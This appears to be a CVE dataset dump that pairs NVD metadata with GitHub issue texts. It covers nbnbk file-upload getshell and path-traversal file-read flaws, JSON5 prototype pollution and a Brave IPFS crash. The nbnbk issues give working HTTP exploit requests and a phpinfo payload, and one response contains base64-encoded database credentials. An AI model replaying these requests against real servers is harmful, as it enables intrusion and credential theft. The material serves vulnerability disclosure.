{"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
```

### 2.在 vps 中启动 http 服务
Start HTTP service in VPS
```sh
echo '<?php phpinfo();' > index.php
python -m http.server 8099
```

### 3.文件上传
File Upload
```http
POST /api/User/download_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
access_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php
```
这里的 access_token 就是上面获取的 token,url 是文件地址,path 是文件名
Access_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功,我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。
Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

## 0x02 漏洞分析
Vulnerability Analysis
### 1.发现危险函数
Discover danger function
通过全局搜索 `fopen` 这个打开文件的函数,发现了 api 下面存在一个 `path` 用变量来控制,极有肯能存在问题。
By searching `fopen`, an open file function globally, we found that there is a `path` under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download_img 的函数,其中 `url` 和 `path` 变量是可控的。
Double-click to find a download_ Function of img where `url` and `path` variables are controllable.

这里直接使用 curl 访问了我们提供的 `url` 并且 `path` 也没有做任何过滤。直接读文件写到指定目录。
Curl is used directly here to access the `url'we provided and `path` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 `token` 错误,下一步我们需要获得` token`。
Construct the approach request directly but prompt `token` error, we need to get `token` next.
### 2.获取token
Get token
看源码可以知道,一定是要登陆才能调用到 `getToken` 。可以通过注册登陆的方式来获取,但是如果关闭了注册功能、注册功能失效,我们就没法获取 `token` 了。有没有不需要有账号密码即可获取 `token` 的方式?
我们继续来看登陆功能的 `Login.php` 发现提供了一种不需要账号密码就可以登陆的方式。
Looking at the source code, you know that you must be logged in to call `getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get `token'. Is there a way to get `token'without an account password?
Let's move on to `Login'for login functionality. Php`Discovery provides a way to log in without an account password.

进一步跟进 `wxLogin` 函数
Follow Up `wxLogin` Function


1. 折叠函数里包含了输入内容的校验,大概意思是用户不存在可以创建一个新的,这里我们可以不用管。
2. 通过了校验之后会生成新的 `token`
1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.
2.New `token'will be generated after passing the check

我们直接构造数据包,填入需要的字段即可直接拿到生成的 `token`。到这里分析就结束了。
We construct the data package directly and fill in the required fields to get the generated `token`. The analysis is over here. | 🛡️ Nbnbk has any file upload Getshell | https://api.github.com/repos/Fanli2012/nbnbk/issues/1/comments | 0 | 2022-03-02T02:48:25Z | 2022-03-04T05:40:30Z | https://github.com/Fanli2012/nbnbk/issues/1 | 1,156,258,187 | 1 | 4,538 |
CVE-2022-46492 | 2022-12-23T01:15:08.723 | nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nbnbk_project:nbnbk:-:*:*:*:*:*:*:*",
"matchCriteriaId": "38134F5C-6B97-44FB-8977-EC132D45B46D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/Fanli2012/nbnbk/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Fanli2012",
"nbnbk"
] | # nbnbk 存在任意文件读取
Nbnbk has an arbitrary file read vulnerability
```http
POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
url=../application/database.php
```
通过修改 `url` 参数来读取文件,来看返回数据。
Return data by modifying the `url` parameter to read the file.
```http
HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8
{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\r\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\r\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\r\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\r\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\r\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\r\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\r\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\r\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\r\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\r\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\r\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\/nuaOpWRzbgogICAgJ2Rz\r\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\/nuaOpeWPguaVsAogICAgJ3Bh\r\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\r\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\r\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\r\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\r\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\r\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\r\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\r\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\r\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\r\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\r\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\r\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\r\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\r\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\r\ngOimgei\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\r\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\r\nIGZhbHNlLApdOwo=\r\n"}
```
文件信息在 `data` 字段中,是 `base64` 编码的格式,但其中包含了大量的 `\r\n` 导致我们没法直接解码。我们可以通过 `js` 去将所有 `\r\n` 删掉。
1. 打开 Google Chrome 游览器
2. 打开一个控制台
3. 输入以下代码
The file information in the `data` field is in the `base64` encoded format, but it contains a large number of `\r\n` which prevents us from decoding it directly. We can delete all `\r\n'through `js'.
1. Open Google Chrome Tour
2. Open a console
3. Enter the following code
```
a = "$data string"
a.replaceAll('\r\n', '')
```
演示将上面代码进行转化
The demonstration transforms the above code

将转化后的数据进行 `base64` 转码 我使用的是 `Google Chrome` 插件 `FeHelper`
Transcoding the converted data `base64` I'm using the `Google Chrome`Plug-in`FeHelper`
 | 🛡️ Nbnbk has an arbitrary file read vulnerability | https://api.github.com/repos/Fanli2012/nbnbk/issues/3/comments | 0 | 2022-03-04T05:39:44Z | 2022-03-04T05:39:44Z | https://github.com/Fanli2012/nbnbk/issues/3 | 1,159,265,726 | 3 | 4,539 |
CVE-2022-46175 | 2022-12-24T04:15:08.787 | JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/199"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/295"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/pull/298"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/295"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/pull/298"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json5:json5:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7F98563A-9DCE-49C6-A85E-B31001233BEA",
"versionEndExcluding": "1.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json5:json5:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "B3608343-A29B-4A05-BE15-9367DF89AE54",
"versionEndExcluding": "2.2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/json5/json5/issues/199 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"json5",
"json5"
] | The json5-spec didn't mention it.
```js
JSON5.parse('{__proto__:1}').__proto__ // not 1
```
I know it's in js-spec, I just wonder whether it should be same like js.
```js
({__proto__:1}).__proto__ // not 1
```
Because in JSON land, `__proto__` key is just a normal key, as a data language.
```js
JSON.parse('{"__proto__":1}').__proto__ // is 1
```
---
BTW: Is it right for JSON5 parser use `[[set]]` not `[[define]]`?
```js
Object.defineProperty(Object.prototype, 'xxx', { set (value) { console.log('setting!'); } });
JSON5.parse('{xxx:1}');// setting!
``` | Should __proto__ property be treated specially? | https://api.github.com/repos/json5/json5/issues/199/comments | 6 | 2019-06-06T04:39:51Z | 2022-10-01T11:22:43Z | https://github.com/json5/json5/issues/199 | 452,828,435 | 199 | 4,540 |
CVE-2022-46175 | 2022-12-24T04:15:08.787 | JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/199"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/295"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/pull/298"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/issues/295"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/pull/298"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json5:json5:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7F98563A-9DCE-49C6-A85E-B31001233BEA",
"versionEndExcluding": "1.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json5:json5:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "B3608343-A29B-4A05-BE15-9367DF89AE54",
"versionEndExcluding": "2.2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/json5/json5/issues/295 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"json5",
"json5"
] | There is a Prototype Pollution vulnerability in JSON5 before and including version `2.2.1`. There is no security policy that I can find for this project, so I am unsure of where to report it. Should I just post the details here? | Prototype Pollution in JSON5 | https://api.github.com/repos/json5/json5/issues/295/comments | 11 | 2022-12-16T01:03:41Z | 2023-01-14T20:18:45Z | https://github.com/json5/json5/issues/295 | 1,499,396,829 | 295 | 4,541 |
CVE-2022-47933 | 2022-12-24T22:15:09.373 | Brave Browser before 1.42.51 allowed a remote attacker to cause a denial of service via a crafted HTML file that references the IPFS scheme. This vulnerability is caused by an uncaught exception in the function ipfs::OnBeforeURLRequest_IPFSRedirectWork() in ipfs_redirect_network_delegate_helper.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/23646"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/24378"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/7ef8cb2f232abdf59ec9c3c99a086a14b972bc56"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/13989"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1610343"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/23646"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/24378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/7ef8cb2f232abdf59ec9c3c99a086a14b972bc56"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/13989"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1610343"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brave:brave:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FE993CC2-7343-4D41-ABF4-84B6DC15763F",
"versionEndExcluding": "1.42.51",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"755"
] | 755 | https://github.com/brave/brave-browser/issues/23646 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"brave",
"brave-browser"
] | https://hackerone.com/reports/1610343
credit:
neeythann | [hackerone] IPFS crash | https://api.github.com/repos/brave/brave-browser/issues/23646/comments | 3 | 2022-06-23T17:00:47Z | 2022-08-02T16:19:51Z | https://github.com/brave/brave-browser/issues/23646 | 1,282,697,089 | 23,646 | 4,542 |
CVE-2022-47933 | 2022-12-24T22:15:09.373 | Brave Browser before 1.42.51 allowed a remote attacker to cause a denial of service via a crafted HTML file that references the IPFS scheme. This vulnerability is caused by an uncaught exception in the function ipfs::OnBeforeURLRequest_IPFSRedirectWork() in ipfs_redirect_network_delegate_helper.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/23646"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/24378"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/7ef8cb2f232abdf59ec9c3c99a086a14b972bc56"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/13989"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1610343"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/23646"
},
{
